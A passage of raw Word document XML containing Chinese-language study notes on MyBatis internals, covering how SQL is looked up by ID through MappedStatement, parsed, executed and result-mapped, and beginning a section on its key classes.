        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345711">
        <w:t>处理过程：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C47FB9" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r w:rsidRPr="00C47FB9">
        <w:t>        (A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>查找对应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C47FB9" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r w:rsidRPr="00C47FB9">
        <w:lastRenderedPageBreak/>
        <w:t>        (B)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>根据传入参数对象解析</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>对象，得到最终要执行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>和执行传入参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C47FB9" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r w:rsidRPr="00C47FB9">
        <w:t>        (C)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>获取数据库连接，根据得到的最终</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>语句和执行传入参数到数据库执行，并得到执行结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C47FB9" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r w:rsidRPr="00C47FB9">
        <w:t>        (D)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>对象中的</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E9C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>结果映射配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>对得到的执行结果进行转换处理，并得到最终的处理结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C47FB9" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r w:rsidRPr="00C47FB9">
        <w:t>        (E)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>释放连接资源</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8"/>
    <w:p w:rsidR="00944ED8" w:rsidRPr="007E61E8" w:rsidRDefault="00944ED8" w:rsidP="007E61E8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5495925" cy="3072036"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="226" name="图片 1" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\95Z(R62Y~JG67OEGQ%BFC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AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\95Z(R62Y~JG67OEGQ%BFC68.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId232" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495925" cy="3072036"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C512C5" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>加载配置：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>配置来源于两个地方，一处是配置文件，一处是</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码的注解，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的配置信息加载成为一个个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对象（包括了传入参数映射配置、执行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>语句、结果映射配置），存储在内存中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C512C5" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>解析：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>接口层接收到调用请求时，会接收到传入</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和传入对象（可以是</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JavaBean</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>或者基本数据类型），</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>会根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>找到对应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，然后根据传入参数对象对</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>进行解析，解析后可以得到最终要执行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>语句和参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C512C5" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>执行：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>将最终得到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和参数拿到数据库进行执行，得到操作数据库的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C512C5" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>结果映射：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>将操作数据库的结果按照映射的配置进行转换，可以转换成</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JavaBean</w:t>
      </w:r>
      <w:r w:rsidRPr="00C512C5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>或者基本数据类型，并将最终结果返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C512C5" w:rsidRDefault="00944ED8" w:rsidP="00944ED8"/>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00DD6166" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mybatis</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中几个重要类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>1.org.apache.ibatis.mapping.MappedStatement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>类在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
